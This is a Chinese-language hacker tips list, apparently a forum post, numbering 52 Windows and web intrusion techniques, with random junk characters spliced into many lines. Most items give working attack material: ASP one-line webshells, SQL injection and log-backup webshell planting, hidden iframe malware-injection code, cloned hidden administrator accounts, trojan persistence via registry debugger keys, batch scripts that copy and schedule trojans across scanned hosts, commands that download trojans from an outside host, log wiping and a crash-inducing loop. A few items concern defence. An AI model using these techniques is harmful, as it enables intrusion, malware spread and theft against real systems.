1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,9 n: L# r z2 _& A2 _
cacls C:\windows\system32 /G hqw20:R/ V9 Z9 q* Z" \; A, t
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入- _1 O/ h; x7 w% _6 Z
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
. ~2 p* T/ Y( R3 O: r+ Z# i# a
6 n# P1 I/ e: D6 A6 @2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。; `7 a0 V+ j' O8 y* i, y
+ z7 ~ k% j: m2 C' J; u
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
) h* p* t5 S& D, j6 P. E& i: o4 b" u0 ^6 G2 M/ v @
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号 K) v7 v. j S% A# |# a/ z
* Z& E* f6 q0 h) i9 B5、利用INF文件来修改注册表
1 x7 \, c4 V* b4 ]9 ~% e[Version]) c$ ?- [$ Z, F; O& u3 I( H' f/ Z
Signature="$CHICAGO$"
% P3 F: m: p! T) J2 P[Defaultinstall]
* U- \: ?; v; naddREG=Ating
0 t8 B: z1 y Q6 R' \4 b! k" }[Ating]
8 o. i! G+ Q. CHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
, ?$ A. D0 Q0 T- o( ?7 ]以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下: p# Z" m1 R( {, a' F
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径/ A+ _/ @; }6 e5 T
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
: V; M+ e O) G& p+ z. {HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
- F. x& j& M2 c5 F; Z5 aHKEY_CURRENT_CONFIG 简写为 HKCC
5 B1 o2 d& s$ k# h" H0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值5 V1 p3 W2 E, p9 ^
"1"这里代表是写入或删除注册表键值中的具体数据0 g8 l) K1 j/ r* N1 A$ ~3 C
4 [" p" C7 a3 W7 R+ _# N% \ D6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,( D6 N$ y* M% M7 _
多了一步就是在防火墙里添加个端口,然后导出其键值* f7 P# r# J7 r P
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]0 I8 I6 A: {1 P; e% N: M2 g) I
6 U3 O! \# @6 M! u$ s ^9 v7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
& D, J1 m7 Y0 q3 n& y$ M) {在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
H, _* X" ?- g, n6 g* |; A6 ^. ], |% E, z
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。1 r- \: F+ L% X7 t8 `
" N3 ~& V; ~ J" j3 I. ?* w3 C
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
! b3 R. E8 e' C5 i可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
+ `) w! g3 t- v x- b" U9 e& \
" a1 U) k# \" @ ]10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”" f7 o; X3 }8 C5 M
- r+ J/ ]' P$ T11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,' s m. Z* o2 D i! `* t
用法:xsniff –pass –hide –log pass.txt
; @3 }3 K9 E) {
0 f) ^$ n+ Z p+ `' d12、google搜索的艺术7 h! E/ g6 J4 c- y
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”5 C9 g3 G% T3 S4 c7 I
或“字符串的语法错误”可以找到很多sql注入漏洞。( \% L6 C( A3 d; v6 E, I
3 c4 o! E- G4 p4 |- s; _# O5 L13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
0 O+ A' \& v0 F$ m! k2 y$ o I" E, ~( v
14、cmd中输入 nc –vv –l –p 1987- \7 F2 X" n& B' [ u
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃4 Z H7 V* a2 p) H: h+ l" a
; r( }0 H! q) q: B4 s8 @9 p6 H
15、制作T++木马,先写个ating.hta文件,内容为) ?; h& k7 t* M3 i5 A4 r2 N4 r
<script language="VBScript">
_8 Y$ d- Y6 ^) z1 w/ u0 mset wshshell=createobject ("wscript.shell" )9 S8 B" V4 P" n2 M! C/ n0 {
a=wshshell.run("你马的名称",1)6 b& y2 F$ q% R+ X& N/ }2 S8 D9 S4 y
window.close
! I6 w8 w4 K2 J) Z</script>7 M# P7 Y5 `( t9 s! ~/ A1 z
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
: L: w2 T' {* i' t. M# A/ Q# k# A9 U; S
16、搜索栏里输入
; E6 _/ I/ L, t9 c$ L. f' i3 i关键字%'and 1=1 and '%'='2 V, l4 p4 K N4 P. u( C; U( \
关键字%'and 1=2 and '%'='
9 U6 v* ]: X/ J比较不同处 可以作为注入的特征字符* @1 G9 G& J; c7 _# n
/ m4 @) m+ c7 j/ F17、挂马代码<html>' P8 W9 P- D# J- L1 t+ k
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>. I5 ^& G: w" I# [( h" ?
</html>; N' K2 }0 T# S- W: w
$ c# p0 I I3 r$ N
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,! e; n/ [" G! d7 m& w% ?
net localgroup administrators还是可以看出Guest是管理员来。6 H U* ?' M b8 \7 T' ?
% g+ e4 u1 k( A5 d, M) z19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等7 ]/ ?4 B4 e7 G6 c
用法: 安装: instsrv.exe 服务名称 路径
+ ^: h6 w) m$ [+ S卸载: instsrv.exe 服务名称 REMOVE
8 _2 R% P) @3 |2 [2 N- [$ M# W) _; a6 @: |/ ^' x4 c; @
5 n) |" e6 ^7 ]7 \1 r4 r21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉' y( K0 D0 s; A' w! t
不能注入时要第一时间想到%5c暴库。' D" R& G4 w5 i* B) q' n
3 h8 S6 }3 c# u' ]" c& y- \
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
- C* ?7 p$ I& l* M. h
5 W v9 [% P8 C7 e; j3 s23、缺少xp_cmdshell时- H3 R( d6 V! x4 M, t. d5 a
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
5 J7 m/ A3 X/ \9 K' A假如恢复不成功,可以尝试直接加用户(针对开3389的)6 {2 @) j" T4 p$ [0 f1 X
declare @o int" G8 X7 o; @; ^0 _
exec sp_oacreate 'wscript.shell',@o out$ ]8 v& m5 d- G; v# d, C
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
5 x: g H% a5 s9 V0 R) C2 F. D/ k& `( |, J# E. _+ x
24.批量种植木马.bat! q( R1 f; k. C) R2 B. w9 r
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
$ P" N* m5 d p' A2 z/ N6 hfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
& E6 { F& P2 m5 U$ W' r扫描地址.txt里每个主机名一行 用\\开头
3 h' T$ Y; T1 E+ I7 e3 R% c2 m# p/ `5 k* {
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
* [# Y6 I7 H6 c: ^/ m+ ^ g' Y2 [2 t
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名. D, b1 J& L+ E! M$ n
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.# t* Y) j. E% t/ v2 v* l
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马' h7 R6 Y! D+ B. s' ]: o
2 x# \8 E, l9 Q3 [
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP% U& A7 d3 d& L# C& ^
然后用#clear logg和#clear line vty *删除日志# f( k% o5 B8 m+ B" f
# W4 d U7 ~: W6 c0 V
28、电脑坏了省去重新安装系统的方法4 j m# D8 V w( P4 `( m, [
纯dos下执行," j- h S4 j! B! n
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
! H) \5 n) Q# v z& l2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
1 c3 U4 w2 u- a2 r: e% k) [- B! _- E* I4 G' S: Y! ^
29、解决TCP/IP筛选 在注册表里有三处,分别是:
# \2 Y. H2 K5 k0 T* P" `HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
% v% R9 x* W* d& R" Z, p# a1 I8 u uHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
% x5 `3 @2 ]8 b1 x- H1 JHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip |; a, j4 _7 M, f, c
分别用- D4 Z2 ^& R% ?1 @& m7 G# z
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
( L7 M) x9 ^% dregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
, u: G3 }3 l& w; G( v& F1 ~regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip7 X7 o* z2 T( t; X
命令来导出注册表项5 I5 E5 d4 g0 q U- e0 ~
然后把三个文件里的EnableSecurityFilters"=dword:00000001,' k; B; O8 V: q8 F+ t" y1 C- v
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
. w% b7 Q+ \# Jregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
& N, y- }$ S1 D4 l" h& B6 `3 ]1 I. h* v0 J& G6 d& \+ q F. y, W* Z
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
* H3 [$ J; G" a- d6 gSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
1 _9 E5 f1 N! a( \; s; h. ]. r
" n8 w( V) c% M: P! n0 o3 }31、全手工打造开3389工具1 i$ y( N1 e4 J4 F
打开记事本,编辑内容如下:
+ J2 Z# N5 w& {5 S7 {7 {1 [5 kecho [Components] > c:\sql$ ~7 t) f* k4 K# Z4 _9 j: [
echo TSEnable = on >> c:\sql
* P# H7 d. W; rsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
% O9 Y4 V! O: w6 y' _7 ~1 D0 u8 i编辑好后存为BAT文件,上传至肉鸡,执行) v) H7 T8 g1 t$ j+ o8 T& ]. F
) T, n0 p0 W7 q9 `
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
) ]* x$ M7 C" }/ w' K4 X% A
' m9 h3 n/ B5 _) J8 A' T33、让服务器重启
3 @- g/ r3 x& S: N写个bat死循环:
5 @4 k+ L' C" N5 I2 l+ F, i@echo off& I% j6 N; O0 B$ f9 H, R
:loop1
1 l& n9 G8 ]" h& B8 S* @) Acls2 s3 `& f6 ~5 O% Q4 J" v0 w' O* {, G
start cmd.exe
6 L. l' `/ Q/ Sgoto loop1
- e' ]4 P/ S" R9 v! q保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
& T5 J3 U6 z- b6 e9 i/ X& E! {9 S: M6 r( z3 @& ]+ }
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
) F% H/ v% V& S( y p@echo off( ?4 D; Z4 Y- \* |) b! @
date /t >c:/3389.txt1 V; g7 R# g; `! v5 Z+ V* e
time /t >>c:/3389.txt, L/ O" r t% P5 q& }- E/ D1 J+ [) S
attrib +s +h c:/3389.bat e- t; i* F/ S. @- w. G
attrib +s +h c:/3389.txt
1 Q2 A) s- [% `& F4 s" q% nnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt# R5 _, ~/ a. m9 _( W3 K
并保存为3389.bat
' U, j* L0 G% A5 n2 C打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号* |3 E9 y! l: o! l1 v
1 M* W4 e1 Z# X- t
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
" c0 ~ |# k: J" h$ U+ [start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
. C9 G4 @$ s1 P# C( q输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。7 s) Y4 H% K! w: Q- R
6 c4 y2 C" g: P& R36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件- G7 s" r' ?2 ^+ \/ r# ~
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址! Q' }; W. @8 `7 ~3 e2 K9 b! O% b: U% R
echo 你的FTP账号 >>c:\1.bat //输入账号
" v6 f5 p5 `& F: cecho 你的FTP密码 >>c:\1.bat //输入密码
1 K1 K! H# D% X. t$ V1 ?echo bin >>c:\1.bat //登入
* S9 h2 K% v3 Y# Aecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么6 G- c9 b- `& F, s8 n, x) _/ n
echo bye >>c:\1.bat //退出1 r, y O! j8 v' D- a: }, q
然后执行ftp -s:c:\1.bat即可3 j9 `+ Q. j* c: C6 F
( `) _& B6 e9 Z; X
37、修改注册表开3389两法9 k6 f R8 E9 I
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
6 H3 f0 v2 j0 Z3 K' ?echo Windows Registry Editor Version 5.00 >>3389.reg) p K$ G Q. h g- ~8 s
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg# H, @% X$ ^- J6 h( i& c. U) ]
echo "Enabled"="0" >>3389.reg6 W8 y6 L$ @: F8 U8 m1 ]
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows) m. ~) t: j# K: C1 ^0 c1 d* t; a& R: U
NT\CurrentVersion\Winlogon] >>3389.reg
3 ?; J7 g$ O; C2 t9 |% }9 Eecho "ShutdownWithoutLogon"="0" >>3389.reg. `3 e2 D( _, d
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
* W- F7 ~% R5 L8 [: o. M>>3389.reg
% Q4 J; `0 K/ @2 a% z; K# Wecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
+ q7 O0 C3 R$ f) G! z) Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]; |4 l- U" j8 q6 T* U2 F/ Y# v
>>3389.reg# X S& m' C7 h; F& P3 S# ]
echo "TSEnabled"=dword:00000001 >>3389.reg
4 e. f* n) K# l; E: [1 Z5 Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg6 D1 b. }1 o3 ?1 \0 y1 k% i9 U, X
echo "Start"=dword:00000002 >>3389.reg7 h( _/ H' U2 y! \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
) O4 v% {3 P9 V/ A. k) A, k, F>>3389.reg
/ B. |# \4 T4 g9 \% _6 }0 j) becho "Start"=dword:00000002 >>3389.reg
$ M: t+ S9 }- U6 ? B! G) f0 @2 B5 Fecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
; _7 y& I9 _0 }. ^6 b0 wecho "Hotkey"="1" >>3389.reg9 \5 y0 c2 Q6 b, `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal5 F3 T4 Q0 {/ k6 n7 r
Server\Wds\rdpwd\Tds\tcp] >>3389.reg( Q2 B3 P9 D* N1 R( ]
echo "PortNumber"=dword:00000D3D >>3389.reg
3 C! I% d6 m8 h! r& r% f7 I- W0 I7 Hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& ~3 {2 y0 R/ H. A! n+ RServer\WinStations\RDP-Tcp] >>3389.reg0 z& M; u' H4 h
echo "PortNumber"=dword:00000D3D >>3389.reg/ J7 G/ V$ k# b# M* W
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
$ W- ?- K# I) z% _- m1 K5 h8 T B' o(如果要改变终端端口只须把上面的两个D3D都改一下就可以了), n: E- C4 ~; Z' B8 w2 ?, J1 V
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效0 E9 B* O6 p8 Q4 }" B0 b3 U+ ?
(2)winxp和win2003终端开启" A. x+ Y! Z& T2 k" b9 n: g
用以下ECHO代码写一个REG文件:
& l1 a- Q! _4 k3 I, f3 ?' ~/ S) xecho Windows Registry Editor Version 5.00>>3389.reg$ Z& O! A0 r2 g) | }0 _& L( n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
3 f$ z" m5 N; DServer]>>3389.reg/ e4 U5 Y% \) o/ v% d g
echo "fDenyTSConnections"=dword:00000000>>3389.reg. q) R8 b# g. Z3 J* f. h7 |' j
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
( `0 z2 E0 `! Q XServer\Wds\rdpwd\Tds\tcp]>>3389.reg" {3 d4 y& R+ K
echo "PortNumber"=dword:00000d3d>>3389.reg
0 N% R& R6 C: v; U8 \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, n# e6 g, e- z0 C6 b* [2 \, RServer\WinStations\RDP-Tcp]>>3389.reg
' S& A7 Y/ H3 r4 b5 l( j3 b I- vecho "PortNumber"=dword:00000d3d>>3389.reg
" @% t j4 ^1 `, ?然后regedit /s 3389.reg del 3389.reg* D) T9 y. Q9 N* N1 j
XP下不论开终端还是改终端端口都不需重启! j0 Z/ ?: d& M' Y. s3 d
1 r) L- D4 C# F. S+ V8 Y38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
' b. U# S( a' h2 e用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
0 i4 {. Y( h3 m- x- t- `5 F3 C3 l3 \ w3 n' e8 _ G
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
7 H" e4 }4 Z( G(1)数据库文件名应复杂并要有特殊字符
6 C. z" I- V, ^6 x( s! r(2)不要把数据库名称写在conn.asp里,要用ODBC数据源* M4 g! H+ d7 w2 O( \
将conn.asp文档中的, X0 H# [) Z. j6 Z8 d
DBPath = Server.MapPath("数据库.mdb")# z' Q; V- o l& O; p5 ~9 y1 u
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath3 n E$ a! G% j9 g6 P' _! G
) U+ p1 p2 v9 I9 ~6 w
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
- D' T* \4 ^2 N1 }$ i(3)不放在WEB目录里
& R8 k& n# U6 `; c2 W' Q' \6 }9 `6 ]9 } u
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
: D2 ?: o( P& L% A( }2 o可以写两个bat文件# W1 o2 C# {* I% Y
@echo off
% V1 g, E0 k0 H1 o; Y' [* b! J@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe+ A6 K+ W! U2 H
@del c:\winnt\system32\query.exe
3 C4 x8 O0 u" f; q {* r@del %SYSTEMROOT%\system32\dllcache\query.exe5 e* `+ U4 u9 ~6 l: ^# a9 q* Q# n
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
) |# e; a) e1 m. H& l& ?- }! m/ q2 B) m0 e% _; l
@echo off `8 [6 x# }# r/ ?; b$ `
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe. F- M" \. E" O$ J
@del c:\winnt\system32\tsadmin.exe9 H" U8 I) o' D" Y: I2 @; l8 ~# C
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
1 C" A# c5 r3 m D! K" ~: R# j: U) w0 N2 D3 M( \
41、映射对方盘符1 E4 q7 s4 `$ N, r0 {
telnet到他的机器上,1 {7 U4 Q t2 N% B
net share 查看有没有默认共享 如果没有,那么就接着运行0 e, ]0 g2 {# R& `
net share c$=c:
, }! k" e1 o* t; f m: ?net share现在有c$
' t+ _" L j. C; s2 t* e8 y在自己的机器上运行
! ]* o7 p1 W' O+ z3 V0 Unet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K7 ]7 z- u0 N% @/ M
5 z9 A8 V0 i3 I$ C; S2 ~
42、一些很有用的老知识9 s6 L) T# x6 b3 c
type c:\boot.ini ( 查看系统版本 )
% H7 F, L1 ?; I9 P0 L$ I2 qnet start (查看已经启动的服务)& P4 r: a ?% ^0 @
query user ( 查看当前终端连接 )
+ C3 i0 w5 E$ a8 [3 Enet user ( 查看当前用户 )
8 z/ X" c6 o; C" V! K6 ~ ~! {net user 用户 密码/add ( 建立账号 )
' M7 ~" t l6 w' Gnet localgroup administrators 用户 /add (提升某用户为管理员)
/ A$ O! |* ~- N% mipconfig -all ( 查看IP什么的 )
& Z; ~) Q& k5 X! w2 U/ F# Onetstat -an ( 查看当前网络状态 )7 _# Z9 e/ s. @% e0 n
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)4 B1 l' z5 V- d
克隆时Administrator对应1F4
/ }+ Z! c4 s aguest对应1F5
. S# p/ W, j8 a* U* g. x" ptsinternetuser对应3E8
4 l6 m3 b: _- X6 p3 I ]9 |8 U5 ^- t; Q* U4 x* X7 j
43、如果对方没开3389,但是装了Remote Administrator Service; o$ `# Y" O6 y1 R. t5 b
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
. H& T- d; V$ ?( E! x$ U# C解释:用serv-u漏洞导入自己配制好的radmin的注册表信息$ G: L: a4 p9 i9 F/ S: M
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
1 l J" u; G2 z4 {
# u+ S$ H! y2 z: J+ ^$ B44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)- {- B/ [ `2 ^
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)3 h+ y/ x! d7 F" e; k9 o% z
! l# |" Z% u: j% H! z+ t9 a
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
% T. i7 @$ J1 |. M! d, f Techo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open5 e4 d5 z+ V1 h4 m
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
* |5 {6 n: H- jCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =* G( G$ ]8 {3 |8 E
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs- ?: ^. @) ?6 C
(这是完整的一句话,其中没有换行符): K% K; p4 Z% h/ F$ s1 G3 V4 Q2 ?
然后下载:
7 A- U! G7 v, C; Wcscript down.vbs http://www.hack520.org/hack.exe hack.exe0 A6 W4 D! N. P4 U: D" `1 T/ @
$ c# ?4 \2 i+ O1 |: b; D
46、一句话木马成功依赖于两个条件:4 v, F1 ?0 t6 P6 h* M
1、服务端没有禁止adodb.Stream或FSO组件
+ z1 R' a8 W" U2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
+ L$ X7 a9 n5 @& R, j
R% C( _' x' i9 }0 ?# W47、利用DB_OWNER权限进行手工备份一句话木马的代码:
! N9 K3 M8 u. j7 k. l;alter database utsz set RECOVERY FULL--
' m l. @) U# N. J" v* ^* y;create table cmd (a image)--
' S7 r8 B, t+ e# a;backup log utsz to disk = 'D:\cmd' with init--9 ^2 H7 V% K8 V& }
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
. Q% I$ u# I0 F5 c0 V; c;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
4 k( [# W P% Q+ l注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。7 o3 n2 f" P1 j3 c3 O/ v
9 ?8 F) W- v9 y" C! _4 |
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:( y0 q" }* H' k
& b9 N1 C; F0 r5 Y% x用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options1 b8 F" }. \5 h3 _- L
所有会话用 'all'。
9 v) q4 z3 U* I: m0 n-s sessionid 列出会话的信息。! {$ n6 _5 \* D& ^0 j7 m. e4 q! T, @' \
-k sessionid 终止会话。7 T* v8 O- @) K% ^3 n, c9 D
-m sessionid 发送消息到会话。
; v1 i2 d- `2 J
, K( S; J; v( D! ]/ g/ pconfig 配置 telnet 服务器参数。
2 e3 m9 N* ] G B* q' Y @9 ~& S9 U2 x# U: V
common_options 为:8 D7 [, x: \7 C" H; x
-u user 指定要使用其凭据的用户
G% u8 g" R' r' k( R; ^-p password 用户密码5 O* _" c$ m! V
- S6 k1 m! W0 H: j; P
config_options 为:
) p: p% w7 n0 j vdom = domain 设定用户的默认域
: A5 E* n2 Z2 h. [* Qctrlakeymap = yes|no 设定 ALT 键的映射
. |) A# L# x7 @: n: ^4 q' _timeout = hh:mm:ss 设定空闲会话超时值
6 u n7 s* K8 j8 P9 O0 Utimeoutactive = yes|no 启用空闲会话。
7 P L- O4 F6 G! l" \4 Ymaxfail = attempts 设定断开前失败的登录企图数。7 i# w t! f$ F$ t
maxconn = connections 设定最大连接数。
; j/ @5 E7 f) ~4 [1 @port = number 设定 telnet 端口。
) x6 L0 E, ^1 ~ D2 B( o3 u* E# {8 Q" Tsec = [+/-]NTLM [+/-]passwd
# T% p2 v2 l4 X+ r设定身份验证机构
& X: O+ H- l9 |% ?# sfname = file 指定审计文件名。
! b* ?" G7 S+ J: ?, Ofsize = size 指定审计文件的最大尺寸(MB)。) v0 i# N' `0 |% x5 d
mode = console|stream 指定操作模式。 `% e" p1 I) v* B* P
auditlocation = eventlog|file|both# t J# R- ^, d9 L8 L! E3 R
指定记录地点
( x g: X# h# q3 q9 c2 Iaudit = [+/-]user [+/-]fail [+/-]admin" Q! S2 M! x; P% T7 G, m$ X
% o# R0 m- m& o l- `49、例如:在IE上访问:% [5 Q$ k: L' _; l
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/6 O/ A' ~9 p- d2 R
hack.txt里面的代码是:# b( d' d. D( x3 v" K: t& r
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">& a6 P7 w' C; t0 R( v6 r% I2 m
把这个hack.txt发到你空间就可以了!) {$ Z( }3 s% [4 W. c
这个可以利用来做网马哦!$ h+ Y0 \* R& Q- V0 t- P; B
- b h O/ E0 C1 s50、autorun的病毒可以通过手动限制!
. ?& s4 D( z0 t# L8 ]1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!% g) Z$ {, h% w) [4 ^
2,打开盘符用右键打开!切忌双击盘符~7 X6 t+ _8 T9 y- X" D
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
8 w+ v# v9 K' A$ _% x2 H
( P) _" \7 m- `: H. U5 {51、log备份时的一句话木马:
' Q( w$ o4 Y- n7 ia).<%%25Execute(request("go"))%%25>
9 W( r( R2 x6 I- i( \+ _* c8 Yb).<%Execute(request("go"))%>
1 k. z8 F8 j4 F" vc).%><%execute request("go")%><%5 n2 q+ R; ^2 v
d).<script language=VBScript runat=server>execute request("sb")</Script>
" C7 e+ @6 H# E+ ie).<%25Execute(request("l"))%25>
; ] z, j- H1 f$ z6 U5 vf).<%if request("cmd")<>"" then execute request("pass")%>, ?0 j. f4 J' ^1 p
/ m: ^2 _& P- ~/ V: e52、at "12:17" /interactive cmd
+ Z0 K, q. l! Z" u; ^执行后可以用AT命令查看新加的任务
, Y1 Y9 |6 c- `" t8 j/ ?6 t用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
